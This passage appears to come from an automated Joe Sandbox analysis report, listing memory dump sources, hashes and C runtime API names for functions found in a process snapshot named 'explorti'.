                      • Instruction Fuzzy Hash: 5C51B2706097928FC319CF2D902563ABFE1BFD5300F084A9EE0E687292DB74D558CB91
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                      • Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b69236aca418db36fa01f707a980880002a552e952bc09fdf9a656d075a39171
                      • Instruction ID: 6bb191a3cd7d875b58ca9a4ded832cfedfeecaf146d8ea8f313fbb0d8aa3131f
                      • Opcode Fuzzy Hash: b69236aca418db36fa01f707a980880002a552e952bc09fdf9a656d075a39171
                      • Instruction Fuzzy Hash: 6D21B673F204394B770CC57E8C572BDB6E1C68C641745823AE8A6EA2C1D968D917E2E4
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                      • Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dd6efc6488ce40042c1194a6ef289ad2982a858311c4c9cfa6597641f468eef5
                      • Instruction ID: cfa2993f61527981b807243ff254386e7b7a56ee8f291b8892543f8ab3ad5f8d
                      • Opcode Fuzzy Hash: dd6efc6488ce40042c1194a6ef289ad2982a858311c4c9cfa6597641f468eef5
                      • Instruction Fuzzy Hash: 2C118A23F30C295B675C817D8C172BAA5D6DBDC25071F533AD826E7384E994DE23D290
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                      • Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction ID: 4f4c8a1a114bdc4c80f52a237bda1326f6f0e38566447ce6b73f7ae1977b448a
                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction Fuzzy Hash: C111387F22014B43D604AE2DC8F4BBBE796EAC53A1B3C437AC3414B758DA229964D900
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                      • Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0a3b9aa0c928804c9bf765e0e863ec0947604f9d01837c09a1bf07611c49f22a
                      • Instruction ID: 1a1233c132c8d7d66cad5ab8c5ba0a1bf93a0624388667434219c66f8e073769
                      • Opcode Fuzzy Hash: 0a3b9aa0c928804c9bf765e0e863ec0947604f9d01837c09a1bf07611c49f22a
                      • Instruction Fuzzy Hash: 6BE086311915886ACE367F16CC0DA8C3B59EB513C1F808414F8084A161CB76EDA2C980
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                      • Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                      • Instruction ID: d5eb46ba91d1184ebeb8a36cbb1aba8cea0ec013de4ed668b68b9cd168eebcce
                      • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                      • Instruction Fuzzy Hash: BCE08C32965268EBCB15DBC9C904D8AF3ECEB48B10F958096F505D7240C2B0EF00CBD0
                      APIs
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                      • Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
                      • String ID:
                      • API String ID: 57040152-0
                      • Opcode ID: 702015ae0d4fc412975a5a5784e1104345786dddd322586c1e28d397a878a1e5
                      • Instruction ID: 98bf51f0b7fab5272a1055f52d44d14fdd680e5e12288b54d03142397016b8f1
                      • Opcode Fuzzy Hash: 702015ae0d4fc412975a5a5784e1104345786dddd322586c1e28d397a878a1e5
                      • Instruction Fuzzy Hash: E9A1D1709203069FDB11EF64C945BAAB7F8FF15390F14862DE819D7641EB30EA28CB91
                      APIs
                      • __Cnd_unregister_at_thread_exit.LIBCPMT ref: 002C795C
                      • __Cnd_destroy_in_situ.LIBCPMT ref: 002C7968
                      • __Mtx_destroy_in_situ.LIBCPMT ref: 002C7971
                      Strings
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                      • Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
                      • String ID: 'k,d+1$@y,$d+1
                      • API String ID: 4078500453-3051532360
                      • Opcode ID: e1c2f1620ab673f456f26699fd94b9efa840f8a217677dbd2f5d0d823fa27338
                      • Instruction ID: 5ac3fc8582d32e542ab528683b375800bfd0472723981bdd8c90b3ec0db01c02
                      • Opcode Fuzzy Hash: e1c2f1620ab673f456f26699fd94b9efa840f8a217677dbd2f5d0d823fa27338
                      • Instruction Fuzzy Hash: 6931F3B19243059BD720DF64D846F56B7E8EF14310F00073EE545C3241E771EA64CBA1
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                      • Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: _wcsrchr
                      • String ID: .bat$.cmd$.com$.exe
                      • API String ID: 1752292252-4019086052
                      • Opcode ID: 00ea6f69934e88b4d4b73ef1ccbd5ade06917765642a64a06869687f5d9de8ff
                      • Instruction ID: a0f1c3b04e74b5a07fdf06bbeff9341e8c002f0ee486b05a8ac16222fcfc3b16
                      • Opcode Fuzzy Hash: 00ea6f69934e88b4d4b73ef1ccbd5ade06917765642a64a06869687f5d9de8ff
                      • Instruction Fuzzy Hash: 81014E376F8397225619281BDC0267B57C89B82BB4B65002BFE48FF3C2DF44DC228690
                      APIs
                      • ___std_exception_copy.LIBVCRUNTIME ref: 002B2806
                      • ___std_exception_destroy.LIBVCRUNTIME ref: 002B28A0
                      Strings
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                      • Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: ___std_exception_copy___std_exception_destroy
                      • String ID: P#+$P#+
                      • API String ID: 2970364248-3630811068
                      • Opcode ID: 70b2a9a9586c1e09a9de834652ffb17de91ee2705a43e96fe575469d42251518
                      • Instruction ID: 8bf694f6cca2586009ac8037497c7382080c573fdf3ccfbfe4aab7d0ff27ce79
                      • Opcode Fuzzy Hash: 70b2a9a9586c1e09a9de834652ffb17de91ee2705a43e96fe575469d42251518
                      • Instruction Fuzzy Hash: F671A071E10248DFDB05CFA8C881BDDFBB5EF49310F54822DE805A7281EB74A994CBA5
                      APIs
                      • ___std_exception_copy.LIBVCRUNTIME ref: 002B2B23
                      Strings
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                      • Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: ___std_exception_copy
                      • String ID: P#+$P#+$This function cannot be called on a default constructed task
                      • API String ID: 2659868963-3747907092
                      • Opcode ID: 5f4ae2c1d74c0765fbba671cdefa165682f7caef8a00d03882623cd15d2f7e41
                      • Instruction ID: 69373df27dba9ba99849b4e6ffd78c72d307890bafe1a761b2a981b760b98585
                      • Opcode Fuzzy Hash: 5f4ae2c1d74c0765fbba671cdefa165682f7caef8a00d03882623cd15d2f7e41
                      • Instruction Fuzzy Hash: FEF0F67092030C9BC715DF689841ADEB7EDDF05300F5042AEF84897641EB70AA648B94
                      APIs
                      • ___std_exception_copy.LIBVCRUNTIME ref: 002B247E
                      Strings
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                      • Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: ___std_exception_copy
                      • String ID: 'k,d+1$P#+$P#+
                      • API String ID: 2659868963-3687900473
                      • Opcode ID: c96602b61fe2440ad73d7e6ef95555d1ff4944c27e44db1370079db165e3a0f0
                      • Instruction ID: ffe50b62689af6755c7638275dc8d2133fd03a81382ae70d7e8d1c0b2cfb571a
                      • Opcode Fuzzy Hash: c96602b61fe2440ad73d7e6ef95555d1ff4944c27e44db1370079db165e3a0f0
                      • Instruction Fuzzy Hash: 0CF0E5B592030C67C718EBE4DC059CAB3ECDE1A300F408A25F644EB640FBB0FA948B91
                      APIs
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                      • Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: _strrchr
                      • String ID:
                      • API String ID: 3213747228-0
                      • Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                      • Instruction ID: 6f5c35f885ebf42d949694acdf36886cea26db1743e3c2a153cb1236e9fb5a26
                      • Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                      • Instruction Fuzzy Hash: 60B168329602C69FDB11CFAAC851BBEBBE5EF55340F7441AAE845DB341D6348D12CB60
                      APIs
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                      • Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: Xtime_diff_to_millis2_xtime_get
                      • String ID:
                      • API String ID: 531285432-0
                      • Opcode ID: 774aedaede76e9a3711c1516632479cb22c6cb9e3aedf9ea3951256c4d324711
                      • Instruction ID: 1403c77275e0a8be2548534b448241a80327373c44c9ab07b652ef69ae495b30
                      • Opcode Fuzzy Hash: 774aedaede76e9a3711c1516632479cb22c6cb9e3aedf9ea3951256c4d324711
                      • Instruction Fuzzy Hash: 1A214F71A111099FDF15EFA4CC82EAEBBB8EF09714F500169F905B7251DB30AD118FA1
                      APIs
                      • __Mtx_init_in_situ.LIBCPMT ref: 002C726C
                      Strings
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                      • Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
